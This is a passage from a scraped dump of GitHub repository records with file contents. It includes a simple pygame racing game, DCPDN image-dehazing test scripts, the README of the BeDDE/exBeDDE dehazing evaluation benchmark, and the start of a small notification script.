input.\n try:\n current_player.commands[arguments[\"input\"]]()\n except KeyError:\n warning(\"Invalid input.\")\n usage(1, arguments['name'])\n\n\nif __name__ == \"__main__\":\n main(arguments)\n" } ]
3
TanyaJPG/MyRepository
https://github.com/TanyaJPG/MyRepository
814457ca9977aae74075cd19ddc89d7baae34c32
9c70a3c69eb103558817cb57321d0db5125a9677
9d8c0a0038cea9c4796de674503dd2db5a2a2a9c
refs/heads/main
2023-01-27T20:28:45.093476
2020-12-04T10:58:45
2020-12-04T10:58:45
318,178,031
0
0
null
2020-12-03T11:56:54
2020-12-03T12:12:16
2020-12-04T10:58:45
Python
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 25, "blob_id": "002d4dd98a71fae781513dbfd1901000e4ac83c9", "content_id": "78a05aa8591d69cd025ce6767dca6537afd4cd88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/child_file.py", "repo_name": "TanyaJPG/MyRepository", "src_encoding": "UTF-8", "text": "Child file content here\nprint (\"inside child file\")\n" }, { "alpha_fraction": 0.8166666626930237, "alphanum_fraction": 0.8166666626930237, "avg_line_length": 29, "blob_id": "f021b126ce5f31fec8ec5bb97b89f530e18c8237", "content_id": "e967650b9b80920031a56ce6c0ef0882f5c7af20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "no_license", "max_line_length": 44, "num_lines": 2, "path": "/README.md", "repo_name": "TanyaJPG/MyRepository", "src_encoding": "UTF-8", "text": "# MyRepository\nMy first repository I have made some changes\n" } ]
2
haipnh/BeDDE-for-defogging
https://github.com/haipnh/BeDDE-for-defogging
e440490220e3fb3303f6717987ebfbd376a4130a
ec9560820ed66d432e8445977ccbcb12bf2de012
625e0320c7c0d69acd555f274c9c803ea94ebff1
refs/heads/master
2023-03-30T14:48:33.267922
2021-04-06T04:00:46
2021-04-06T04:00:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5996967554092407, "alphanum_fraction": 0.6315390467643738, "avg_line_length": 22.553571701049805, "blob_id": "3278cae3f60243d045e0914d8e88d25dfb5d365f", "content_id": "33494e927bae95a31f014f2e1178fa92e78a050c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "no_license", "max_line_length": 80, "num_lines": 56, "path": "/DCPDN/generate_testsample.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "#coding=utf-8\nfrom __future__ import division\n\nimport sys\nsys.path.append(\"./mingqingscript\")\n\n\nimport os\nimport glob\nimport h5py\n\nimport numpy as np\nfrom scipy import misc\n\n\ndef array2PIL(arr, size):\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*numpy.ones((len(arr),1), numpy.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n# ------------------\ntest_image_root = './demo_image/'\nsave_root = './demo_image/'\n\n\nsave_size = 512 # 512 is default\n# ------------------\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\ncurImageNames = glob.glob(os.path.join(test_image_root,'*.png'))\n\nfor imgName in curImageNames:\n print('process %s'%imgName)\n img = misc.imread(imgName)\n\n img_rs = misc.imresize(img, (save_size,save_size), 'bilinear').astype(float)\n haze_image=img_rs\n # gt_img=img_rs\n\n # img = img/255\n\n haze_image=haze_image/255\n # gt_img=gt_img/255\n\n prefix = imgName.split('/')[-1][:-4]\n saveFilePath = os.path.join(save_root, prefix+'.h5')\n h5f=h5py.File( saveFilePath,'w')\n\n h5f.create_dataset('haze',data=haze_image)\n h5f.create_dataset('trans',data=0)\n h5f.create_dataset('ato',data=0)\n h5f.create_dataset('gt',data=0)\n" }, { "alpha_fraction": 0.7216642498970032, "alphanum_fraction": 0.7474892139434814, "avg_line_length": 29.30434799194336, "blob_id": "ff3cccb314df54afdcf0b9e0dd4eb2851854ef63", "content_id": "0eb9c5447da1353e471a9c743a6b66eb35de4871", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 697, "license_type": "no_license", "max_line_length": 165, "num_lines": 23, "path": "/DCPDN/README.md", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "## Our environment\n\n- Ubuntu 16.04\n- Python v3.5\n- PyTorch v0.3.1 & Torchvision v0.2.0\n\n## Testing on sample images\n1. Download the [pretrained model](https://github.com/hezhangsprinter/DCPDN#demo-using-pre-trained-model) from the original author. Place the model in `./demo_model`\n\n2. Generate .h5 files for test images by \n\n`python generate_testsample.py`\n\nIf it successes, there should be .h5 files in the folder `demo_image`.\n\n3. 
Test sample images by\n\n```python demo.py --valDataroot ./demo_image --netG ./demo_model/netG_epoch_8.pth```\n\nAfterwards, the restored images will be saved in the folder `demo_image`\n\n## References\nOriginal implementation: https://github.com/hezhangsprinter/DCPDN\n" }, { "alpha_fraction": 0.572257399559021, "alphanum_fraction": 0.597046434879303, "avg_line_length": 28.625, "blob_id": "f09052ebf42b830fa989463dfd24ffb25ca698fe", "content_id": "696471ff1e5cd2e07c4ae3f6d0eb15353f337fe5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/DCPDN/generate_BeDDE.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "#coding=utf-8\nfrom __future__ import division\n\nimport sys\nsys.path.append(\"./mingqingscript\")\n\nimport os\nimport glob\nimport h5py\n\nimport numpy as np\nfrom scipy import misc\n\n\ndef array2PIL(arr, size):\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*numpy.ones((len(arr),1), numpy.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n# ------------------\ntest_image_root = '../my_testset/resized'\nsave_root = '../my_testset/for_DCPDN'\n\nsave_size = 1024 # 512 is default\n# ------------------\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\nfor folderName in allRootFiles:\n if '.' != folderName and '..' != folderName and ('.' not in folderName):\n cityFolderNames.append(folderName)\n\n for cityName in cityFolderNames:\n curImgFolder = os.path.join(test_image_root, cityName, 'fog')\n curSaveFolder = os.path.join(save_root, cityName, 'fog')\n if not os.path.exists(curSaveFolder):\n os.makedirs(curSaveFolder, mode=0o777)\n\n curImageNames = glob.glob(os.path.join(curImgFolder,'*.png'))\n\n for imgName in curImageNames:\n print('process %s'%imgName)\n img = misc.imread(imgName)\n\n img_rs = misc.imresize(img, (save_size,save_size), 'bilinear').astype(float)\n haze_image=img_rs\n # gt_img=img_rs\n\n # img = img/255\n\n haze_image=haze_image/255\n # gt_img=gt_img/255\n\n prefix = imgName.split('/')[-1][:-4]\n saveFilePath = os.path.join(curSaveFolder, prefix+'.h5')\n h5f=h5py.File( saveFilePath,'w')\n\n h5f.create_dataset('haze',data=haze_image)\n h5f.create_dataset('trans',data=0)\n h5f.create_dataset('ato',data=0)\n h5f.create_dataset('gt',data=0)\n" }, { "alpha_fraction": 0.7145363688468933, "alphanum_fraction": 0.732622504234314, "avg_line_length": 61.32478713989258, "blob_id": "9538cb4f8a1e05c5fb8ec629f30b637224d24171", "content_id": "03556f196c913749985b1af55188158dd436c368", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7532, "license_type": "no_license", "max_line_length": 1041, "num_lines": 117, "path": "/README.md", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "# BeDDE & exBeDDE for dehazing evaluation\r\n## BeDDE\r\n|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_clear_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_3_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_2_rs.jpg\" width=\"\"/>|<img 
src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_6_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_21_rs.jpg\" width=\"\"/>|\r\n|:---:|:---:|:---:|:---:|:---:|\r\n|Reference image|Light|Light|Medium|Heavy|\r\n\r\nBeDDE (read as /ˈbedi/) is a real-world benchmark dataset for evaluations of dehazing methods.\r\nIt consists of 208 pairs of hazy images and clear refernece images. \r\nFor each pair, a manually labelled mask is provided to delineate regions with the same contents.\r\nWe evaluate dehazing results on those regions.\r\n\r\n## exBeDDE\r\nexBeDDE is an extension of BeDDE, designed to **measure the performance of dehazing evaluation metrics**. It contains 167 hazy images and 1670 dehazed images with mean opinion scores labeled by people. Its hazy images come from BeDDE, and the dehazed images are generated by 10 dehazing methods.\r\n\r\n## Visibility Index (VI) and Realness Index (RI)\r\nWe find it is more reasonable to evaluate dehazed reuslts from two separate aspects, i.e., visibility and realness, and acorrdingly propose two criteria, i.e., visibility index (VI) and realness index (RI). More details can be found in the [paper](https://ieeexplore.ieee.org/document/9099036) (or [this link](https://sse.tongji.edu.cn/linzhang/files/TIP-BeDDE.pdf)) titled as _Dehazing Evaluation: Real-World Benchmark Datasets, New Criteria and Baselines_. (Presented in Trans. Image Process.)\r\n\r\n# Download\r\nYou can download [BeDDE](https://drive.google.com/file/d/12p-MY2ZygT5Tl8q0oFxDIUg9B5Jn042-/view?usp=sharing) and [exBeDDE](https://drive.google.com/file/d/1swAyQS-j9QNTvLwsCJgbFXnjscB86CeL/view?usp=sharing) on Google drive.\r\n\r\nYou may also get access to [the two datasets](https://pan.baidu.com/s/1lUVtdhyrvFBwl8tmwxqUXg) (key: m53p) on BaiduYun disk.\r\n\r\n# Testing\r\n## Our environment\r\n- Matlab 2017b\r\n\r\n## Test on BeDDE\r\n1. Download BeDDE.rar and unzip it to `./Defogging_eval`\r\n\r\n2. Set Matlab work folder to `./Defogging_eval`\r\n\r\n3. Run `eval_defog_method.m`\r\n\r\nThen, you will see the VI score of hazy images. You may modify the variables to try other dehazing methods or metrics. \r\nMoreover, the score for each image will be stored in `./statistics/<your_method_name>_<metric>_eval.mat`.\r\n\r\n4. Run `eval_defog_method_stat_by_level.m` to get evaluations on level. \r\n\r\nThis script requires the stored scores generated in last step, but you may use the example scores for [RefineDNet](https://github.com/xiaofeng94/RefineDNet-for-dehazing). For your case, you should modify variables `method_names` and `metric_name`. \r\n\r\nThe difficulty levels are stored in `./fog_level_labels/fog_level.mat`.\r\n\r\n## Test on exBeDDE\r\n1. Download exBeDDE.rar and unzip it to `./Defogging_eval`\r\n\r\n2. Set Matlab work folder to `./Defogging_eval`\r\n\r\n3. Run `assess_IQA_metric.m`\r\n\r\nIt will take a while. After that, you will see the performance of our VI on hazy groups. You may modify the variables to test on dehazed groups or assess other metrics.\r\n\r\n## Test your own dehazing method on BeDDE\r\n1. Create a folder named after your method in each city folder of BeDDE. Put the images results of each city to the corresponding folder you just created. Name all the dehazed images after their original hazy images or make sure the name of a dehazed image starts with the name of its original hazy image. 
Your directory tree may look like, \r\n```\r\nBeDDE\r\n├── beijing\r\n│ ├── fog\r\n│ │ ├── beijing_1.png\r\n│ │ ├── beijing_2.png\r\n│ │ ...\r\n│ │ └── beijing_15.png\r\n│ ├── gt\r\n│ ├── mask\r\n│ ├── <your_method_name>\r\n│ │ ├── beijing_1_<your_method_name>.png\r\n│ │ ├── beijing_2_<your_method_name>.png\r\n│ │ ...\r\n│ │ └── beijing_15_<your_method_name>.png\r\n├── changsha\r\n│ ...\r\n├── chengdu\r\n│ ...\r\n...\r\n```\r\n\r\n2. Set the variable `method_name` in `eval_defog_method.m` to the name of your method.\r\n\r\n3. Set the variable `eval_method` to `VI`, `RI`, `VSI` or other metrics and then run the script to get the score for your method on BeDDE.\r\n\r\n# Benchmarks\r\n## Dehazing methods\r\nAll methods were evaluated on BeDDE. VI shows their abilities to restore visibility, RI and LPIPS refer to realness of the results.\r\n![dehazing benchmarks](https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/dehazing_bm.jpg)\r\n\r\n## Dehazing metrics\r\nAll metrics were assessed on exBeDDE's hazy groups for the visibility evaluation and on dehazing groups for the realness evaluation.\r\n|Visibility evaluation|Realness evaluation|\r\n|:---:|:---:|\r\n|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/metric_bm_vi.jpg\" width=\"300\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/metric_bm_ri.jpg\" width=\"300\"/>|\r\n\r\n# Dehazing methods\r\nThe selected 14 dehazing methods adopted by exBeDDE are \r\nFast Visibility Restoration (FVR), \r\nDark Channel Prior (DCP), \r\nBayesian Defogging (BayD), \r\nColor Attenuation Prior (CAP), \r\nNon-Local image Dehazing (NLD), \r\nMSCNN, \r\nDehazeNet, \r\nAOD-Net, \r\nDCPDN, \r\nGFN, \r\nDisentGAN,\r\nLearning a patch quality comparator (PQC), \r\nEPDN,\r\nand GridDehazeNet.\r\n\r\nWe used offical code for all dehazing methods (except DCP). Please try the code link for those methods listed as follows: [FVR](http://perso.lcpc.fr/tarel.jean-philippe/visibility/) (Bottom), [DCP](https://github.com/sjtrny/Dark-Channel-Haze-Removal), <!--[BayD](https://www.cs.drexel.edu/~kon/codeanddata/defog/),--> [CAP](https://github.com/JiamingMai/Color-Attenuation-Prior-Dehazing), [NLD](https://github.com/danaberman/non-local-dehazing), [MSCNN](https://github.com/rwenqi/Multi-scale-CNN-Dehazing), [DehazeNet](https://github.com/caibolun/DehazeNet), [AOD-Net](https://github.com/Boyiliee/AOD-Net), [DCPDN](https://github.com/hezhangsprinter/DCPDN) (Also try [this code](https://github.com/xiaofeng94/BeDDE-for-defogging/tree/master/DCPDN) with less issues to fix), [GFN](https://github.com/rwenqi/GFN-dehazing), [DisentGAN](https://github.com/xyang35/Disentangled-GAN), [PQC](https://github.com/san-santra/dehaze_t_comparator), [EPDN](https://github.com/ErinChen1/EPDN), [GridDehazeNet](https://github.com/proteus1991/GridDehazeNet)\r\n\r\n<!--Code of those methods used in our experiments is available upon email requests. If one is frequently required, we will release it here as well. Current released methods: [DCPDN](https://github.com/xiaofeng94/BeDDE-for-defogging/tree/master/DCPDN)-->\r\n\r\n# References\r\nIf our datasets and criteria are helpful, please consider citing the following papers. [1] and [2] for BeDDE. [2] for exBeDDE, VI, and RI.\r\n\r\n[1] S. Zhao, L. Zhang, _et al._ Evaluation of defogging: A real-world benchmark dataset, a new criterion and baselines. In _ICME_, pp.1840-1845, 2019.\r\n\r\n[2] S. Zhao, L. 
Zhang, _et al._ Dehazing Evaluation: Real-world Benchmark Datasets, Criteria and Baselines. _IEEE Trans. Image Process._, 28(1):6947-6962, 2020.\r\n" }, { "alpha_fraction": 0.6037117838859558, "alphanum_fraction": 0.6226346492767334, "avg_line_length": 25.689319610595703, "blob_id": "189f6123733a931f31f795f1a12bc108e9a29cd9", "content_id": "8597fcae4aafbc1e7ea047414ab112a19cc7b421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2748, "license_type": "no_license", "max_line_length": 115, "num_lines": 103, "path": "/DCPDN/test_BeDDE.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "import os\nimport random\nimport time\n\nimport torch\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\n\nfrom misc import *\nimport dehaze22 as net\n\n# ----------------------\ntest_image_root = '../my_testset/for_DCPDN'\nsave_root = '../my_testset/results_temp'\n\nmethod_name = 'DCPDN'\nuseGPU = True\nimageSize = 1024\n# ----------------------\n\n\ndataset_type = 'pix2pix_val'\n\n\nvalBatchSize = 1\nworkerNum = 1\nmanualSeed = random.randint(1, 10000)\n\nngf = 64\nndf = 64\ninputChannelSize = 3\noutputChannelSize= 3\n\nnetG = net.dehaze(inputChannelSize, outputChannelSize, ngf)\n\nmodel_file = './demo_model/netG_epoch_8.pth'\nnetG.load_state_dict(torch.load(model_file))\nprint(netG)\n\nnetG.train()\nif useGPU:\n netG.cuda()\n\ninputHolder = torch.FloatTensor(valBatchSize, inputChannelSize, imageSize, imageSize)\nif useGPU:\n inputData = Variable(inputHolder.cuda(),volatile=True)\nelse:\n inputData = Variable(inputHolder,volatile=True)\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\nfor folderName in allRootFiles:\n if '.' != folderName and '..' != folderName and ('.' not in folderName):\n cityFolderNames.append(folderName)\n\ntotalTime = 0\ntotalImgCount = 0\nfor cityName in cityFolderNames:\n valDataroot = os.path.join(test_image_root, cityName, 'fog')\n\n valDataloader = getLoader(dataset_type,\n valDataroot,\n imageSize, # not used\n imageSize, # not used\n valBatchSize,\n workerNum,\n mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5),\n split='Train',\n shuffle=False,\n seed=manualSeed)\n\n curSaveFolder = os.path.join(save_root, cityName, method_name)\n if not os.path.exists(curSaveFolder):\n os.makedirs(curSaveFolder, mode=0o777)\n\n print('----- %s'%cityName)\n for i, data in enumerate(valDataloader):\n input_cpu, _, __, ___, file_name = data\n\n if useGPU:\n input_cpu = input_cpu.float().cuda()\n else:\n input_cpu = input_cpu.float()\n # get paired data\n inputData.data.resize_as_(input_cpu).copy_(input_cpu)\n\n t0 = time.time()\n x_hat, tran_hat, atp_hat, dehaze2= netG(inputData)\n elapsedT = time.time() - t0\n totalTime = totalTime + elapsedT\n print('elapsed time: %f'%elapsedT)\n totalImgCount = totalImgCount + 1\n\n zz=x_hat.data\n \n zz1=zz[0,:,:,:]\n vutils.save_image(zz1, os.path.join(curSaveFolder, '%s_%s.png'%(file_name[0].split('/')[-1][:-3],method_name)),\n normalize=True, scale_each=False)\n\nprint('total time: %.4f'%totalTime)\nprint('total count: %d'%totalImgCount)\nprint('average time: %.4f'%(totalTime/totalImgCount))" } ]
5
Finse/Race-To-The-End-Python
https://github.com/Finse/Race-To-The-End-Python
fc39af8a7bdc0c67fd57a65c23bfcb13c916bef4
24c3c57b9021be360abab112ad596c0484cfb68d
8b6b39a409cd3f8077459927759909d435d55196
refs/heads/master
2022-12-10T15:22:11.050454
2020-09-04T02:44:46
2020-09-04T02:44:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7510204315185547, "alphanum_fraction": 0.7632653117179871, "avg_line_length": 34, "blob_id": "3a6f3ccd9bbb70569cab5b0b489fb00891f76369", "content_id": "a06a0889815cd24471dc2003457cdf1181683d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 245, "license_type": "no_license", "max_line_length": 55, "num_lines": 7, "path": "/README.md", "repo_name": "Finse/Race-To-The-End-Python", "src_encoding": "UTF-8", "text": "# Race-To-The-End-Python\n\nRace to the end is a simple 2d racing game where\nyou have to avoid stop signs and collect coins.\nYou have 3 lives to do that and you get 1 point per\nstop sign dogged.It is also my first python game and it\nUse's pygame.\n" }, { "alpha_fraction": 0.5431309938430786, "alphanum_fraction": 0.6273162961006165, "avg_line_length": 16.106557846069336, "blob_id": "717e200ad1855ea73967a5860875be3d3e69c6d3", "content_id": "7a8f47020eac78e1993d31f76c2166d7da65e26e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6260, "license_type": "no_license", "max_line_length": 83, "num_lines": 366, "path": "/Race To End/Race To The End.py.py", "repo_name": "Finse/Race-To-The-End-Python", "src_encoding": "UTF-8", "text": "import pygame\nimport time\nimport random\nimport math\n\npygame.init()\n\nwin_width = 900\nwin_height = 600\n\nGameIcon = pygame.image.load('game icon.png')\n\nBg = pygame.image.load('game bg.png')\n\nCarImage = pygame.image.load('racing-car.png')\n\nStopImage = pygame.image.load('stop.png')\n\n\ncrashS = pygame.mixer.Sound(\"crash.wav\")\n\ncoins = pygame.image.load('dollar.png')\n\n\n\nwin = pygame.display.set_mode((win_width, win_height))\n\npygame.display.set_caption('Race To End')\n\npygame.display.set_icon(GameIcon)\n\n\nx = 380\ny = 530\nwidth = 64\nheight = 64\nvel = 2.8\nlives = 3\nscore = 0\ncrashstate = False\nrun = False\ncoinC = 0\nhighscore = 0\n\n\n\nstopvel = 6\nstopX2 = random.randint(10, 300)\nstopX = random.randint(350, 800)\nstopY = 35\n\ncoiny = 35\ncoinx = random.randint(10, 800)\n\ndef crash(count):\n\tglobal scorex\n\tglobal scorey\n\tglobal scoreSize\n\tglobal run\n\tglobal menu\n\tglobal startMenu\n\tglobal stopvel\n\tglobal lives\n\tglobal stopvel\n\tglobal score\n\tglobal highscore\n\tglobal HSM\n\tglobal fileH\n\tglobal coinC\n\tglobal fileH\n\tglobal hsr\n\n\n\tstopvel = 0\n\n\tstopX2 = random.randint(10, 300)\n\ttopX = random.randint(350, 800)\n\n\tlives -= 1\n\n\n\n\n\tmouseP = pygame.mouse.get_pos()\n\tmouseC = pygame.mouse.get_pressed()\n\n\tstopvel == 0 \n\n\tif 750 + 80 > mouseP[0] > 750 and 480 + 50 > mouseP[1] > 480:\n\t\tif mouseC[0] == 1:\n\t\t\trun = False\n\n\t\t\thighscore += score\n\n\tif 350 + 80 > mouseP[0] > 350 and 480 + 50 > mouseP[1] > 480:\n\t\tif mouseC[0] == 1:\n\n\t\t\thighscore += score\n\n\n\t\t\tlives = 3\n\t\t\tstopvel = 4\n\t\t\tscore = 0\n\t\t\tnice = True\n\n\n\n\tscorex = 330\n\tscorey = 400\n\tscoreSize = 45\n\n\tcrashstate = True\n\n\tfont = pygame.font.SysFont(\"comicsansms\", 100)\n\tsFont = pygame.font.SysFont(\"comicsansms\", 25)\n\n\ttextb3 = sFont.render(\"Play\", True, (0,0,0))\n\ttextB2 = sFont.render(\"Quit\", True, (0,0,0))\n\n\n\tcrasht = font.render(\"You Crashed\", True, (0, 0, 0))\n\tpygame.draw.rect(win, (255, 255, 255), (0, 0, win_width, win_height))\n\n\tpygame.draw.rect(win, (0 , 255, 0), (350, 480, 80, 50))\n\n\n\tfont = pygame.font.SysFont(\"comicsansms\", 45)\n\ttext = font.render(\"score: \"+str(count), True, (0, 0, 
255))\n\twin.blit(text,(400, 350))\n\twin.blit(crasht,(230, 120))\n\twin.blit(textb3, (355, 480))\n\n\tpygame.draw.rect(win, (255, 0, 0), (750, 480, 80, 50))\n\twin.blit(textB2, (750, 480))\n\t\t\n\tpygame.display.update()\n\n\n \ndef isCollision():\n\tglobal lives\n\tglobal x\n\tglobal stopY\n\tglobal stopX\n\tglobal stopX2\n\n\n\n\n\n\tif y < stopY + 128:\n\t \tprint(\"y crossover\")\n\t \tif x > stopX and x < stopX + 128 or x + 64 > stopX and x + 64 < stopX + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tlives -= 1\n\t \t\tstopY = 35\n\t \t\tstopX2 = random.randint(10, 800)\n\t \t\tstopX = random.randint(10, 800)\n\n\t \tif x > stopX2 and x < stopX2 + 128 or x + 64 > stopX2 and x + 64 < stopX2 + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tlives -= 1\n\t \t\tstopY = 35\n\t \t\tstopX2 = random.randint(10, 800)\n\t \t\tstopX = random.randint(10, 800)\n\n\ndef isCollisionCoin():\n\tglobal y\n\tglobal x\n\tglobal coinx\n\tglobal coiny\n\tglobal coinC\n\tglobal C\n\tglobal CM\n\tglobal fileC\n\tglobal coinC\n\n\n\n\n\tif y < coiny + 128:\n\t \tprint(\"y crossover\")\n\t \tif x > coinx and x < coinx + 128 or x + 64 > coinx and x + 64 < coinx + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tcoinC += 1\n\t \t\tcoiny = 35\n\t \t\tcoinx = random.randint(10, 800)\n\n\ndef livescount(count):\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Lives: \"+str(count), True, (255, 0, 0))\n\twin.blit(text,(5, 3))\n\ndef scorecount(count):\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Score: \"+str(count), True, (0, 0, 255))\n\twin.blit(text,(4, 21))\n\ndef coincount(count):\n\tglobal coinC\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Coins: \"+ str(coinC), True, (255,255,0))\n\twin.blit(text,(4, 40))\n\ndef hscorecount():\n\tglobal highscore\n\tglobal HSM\n\tglobal hsr\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"HighScore: \"+ str(highscore) + \" \", True, (0,255,0))\n\twin.blit(text,(4, 63))\n\n\n\ndef startMenu():\n\tglobal run\n\n\tmenu = True\n\twhile menu:\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tquit()\n\n\t\tmouseP = pygame.mouse.get_pos()\n\t\tmouseC = pygame.mouse.get_pressed()\n\n\t\tif 150 + 80 > mouseP[0] > 150 and 480 + 50 > mouseP[1] > 480:\n\t\t\tif mouseC[0] == 1:\n\t\t\t\tmenu = False\n\t\t\t\trun = True\n\n\n\t\tif 750 + 80 > mouseP[0] > 750 and 480 + 50 > mouseP[1] > 480:\n\t\t\tif mouseC[0] == 1:\n\t\t\t\tmenu = False\n\n \n\n\t\t\t\n\t\twin.fill((250, 250,250))\n\n\t\tsFont = pygame.font.SysFont(\"comicsansms\", 25)\n\t\tfont = pygame.font.SysFont(\"comicsansms\", 100)\n\t\ttext = font.render(\"Race To The \", True, (0,185,255))\n\t\ttext1 = font.render(\" End\", True, (0,185,255))\n\t\ttextB1 = sFont.render(\"Start\", True, (0,0,0))\n\t\ttextB2 = sFont.render(\"Quit\", True, (0,0,0))\n\t\ttextB3 = sFont.render(\"Shop\", True, (0,0,0))\n\t\ttextby = sFont.render(\"by Gurman\", True, (150, 255, 0))\n\n\n\t\tpygame.draw.rect(win, (0, 255, 0), (150, 480, 80, 50))\n\t\tpygame.draw.rect(win, (255, 0, 0), (750, 480, 80, 50))\n\n\n\t\twin.blit(text,(200, 50))\n\t\twin.blit(text1, (250, 150)) \n\t\twin.blit(textB1, (153, 480))\n\t\twin.blit(textB2, (753, 480))\n\t\twin.blit(textby, (450, 560))\n\t\tpygame.display.update()\n\t\t\nrun = False\n\nstartMenu()\nwhile run:\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trun = False\n\n\tkeys = pygame.key.get_pressed()\n\tif keys[pygame.K_LEFT]:\n\t\tx -= vel\n\n\tif 
keys[pygame.K_RIGHT]:\n\t\tx += vel\n\n\tif x >= win_width - 50 :\n\t\tx -= vel\n\n\tif x <= -1:\n\t\tx += vel\n\n\tif stopX == stopX2:\n\t\tstopX2 += 138\n\n\tif stopX == stopX2:\n\t\tstopX2 -= 138\n\n\tstopY += stopvel\n\n\n\tif stopY >= win_height - 64:\n\t\tstopY = 35\n\t\tstopX2 = random.randint(10, 300)\n\t\tstopX = random.randint(350, 800)\n\n\n\tisCollision()\n\tisCollisionCoin()\n\n\n\n\twin.blit(Bg, (0, 0))\n\twin.blit(CarImage, (x, y))\n\twin.blit(coins, (coinx, coiny))\n\n\twin.blit(StopImage, (stopX, stopY))\n\twin.blit(StopImage, (stopX2, stopY))\n\n\n\tlivescount(lives)\n\n\tscorecount(score)\n\n\tcoincount(coinC)\n\n\thscorecount()\n\n\n\n\tif y <= stopY and not x == stopX:\n\t\tscore += 1\n\n\tif lives == 0:\n\t\tcrash(score)\n\t\tpygame.mixer.Sound.play(crashS)\n\n\tif lives <= 0:\n\t\tcrash(score)\n\n\tcoiny += 4\n\n\tif coiny >= win_height :\n\t\tcoiny = 35\n\t\tcoinx = random.randint(10, 800)\n\n\n\tif score == 4:\n\t\tstopvel = 7\n\n\tif score == 10 :\n\t\tstopvel = 8\n\n\tif score == 16 :\n\t\tstopvel = 9\n\n\tif score == 25:\n\t\tstopvel = 10\n\n\n\tif score == 50:\n\t\tstopvel = 13\n\n\n\n\n\n\tpygame.display.update()\n\n\npygame.quit()" } ]
2
kaidegit/2021-emb
https://github.com/kaidegit/2021-emb
6e95210c98f3399b063e027879005670e7b5ad38
892e9dd6e0944113298fcf86d7084c8eb4359977
4d2eb27e694bd0382f2a1ef940e6eff46b399e92
refs/heads/main
2023-08-30T07:11:41.446768
2021-11-14T07:24:43
2021-11-14T07:24:43
405,392,044
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.565517246723175, "alphanum_fraction": 0.565517246723175, "avg_line_length": 18.33333396911621, "blob_id": "24c00e1a96cf9be0796bacb1851e7bec683c3713", "content_id": "afa2363be7bed0d2e1c449218f58357c5249b418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/lx2k/serverChan.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef sendMsg(title, desp):\n # url根据server酱生成的地址写\n url = 'http://sctapi.ftqq.com/.send'\n data = {\n 'title': title,\n 'desp': desp\n }\n res = requests.post(url=url, data=data)\n\n\nif __name__ == '__main__':\n sendMsg(\"警告:有人跌倒了\", \"您家老人似乎跌倒了,请及时处理\")\n" }, { "alpha_fraction": 0.6187499761581421, "alphanum_fraction": 0.6556817889213562, "avg_line_length": 26.076923370361328, 